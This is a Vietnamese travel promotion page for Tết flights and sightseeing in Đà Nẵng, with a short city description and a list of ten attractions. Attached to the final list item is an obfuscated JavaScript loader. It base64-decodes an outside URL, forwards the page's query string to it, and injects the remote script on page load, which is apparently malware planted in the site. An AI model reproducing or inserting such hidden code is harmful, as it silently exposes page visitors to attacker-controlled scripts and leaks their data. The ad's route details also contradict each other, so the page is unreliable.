Vé Máy Bay Tết SGN-DAD-SGN

  • Khỏi lo lắng vấn đề di chuyển, vì đã có vé máy bay khứ hồi Hà Nội – Đà Nẵng với giá ưu đãi nhất cùng 7 kg hành lý xách tay và 20 kg hành lý ký gửi
  • Tự do khám phá phố biển Đà Nẵng xinh đẹp và sầm uất

Du lịch Đà Nẵng bạn không chỉ được chiêm ngưỡng cảnh đẹp của biển, những cây cầu xinh đẹp mà còn nhiều điều hấp dẫn khác.

Là thành phố trực thuộc trung ương lớn thứ 4 tại Việt Nam, Đà Nẵng giáp tỉnh Thừa Thiên – Huế về phía Bắc, giáp tỉnh Quảng Nam ở phía Tây, phía Nam và giáp biển Đông ở phía Đông. Đặc biệt, vì thuộc khu vực du lịch Nam Trung Bộ nổi tiếng, Đà Nẵng có thời tiết mát mẻ, khí hậu ôn hòa cũng như rất phù hợp cho việc phát triển du lịch.

Ngoài ra, để chuyến nghỉ dưỡng của bạn với bạn bè, gia đình thêm dễ chịu, bạn nên du lịch Đà Nẵng trong khoảng tháng 9 – tháng 10. Bởi, đây là giai đoạn giao mùa, khi đó nắng sẽ bớt gắt, trời mát mẻ và cũng phù hợp cho bạn đi tắm biển, tham quan nhiều nơi hơn.

Các địa điểm hot:

1. Công viên Châu Á
2. Bà Nà Hills
3. Ngũ Hành Sơn
4. Khu du lịch Hòa Phú Thành
5. Công viên biển Đông
6. Bảo tàng Điêu khắc Chăm Đà Nẵng
7. Công viên nước Mikazuki 365
8. Công viên Suối khoáng nóng Núi Thần Tài Đà Nẵng
9. Cung thiếu nhi Đà Nẵng
10. Chùa Linh Ứng(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();

Tags:

Bình luận

0 bình luận

  • Hãy là người đầu tiên để lại bình luận cho bài viết này!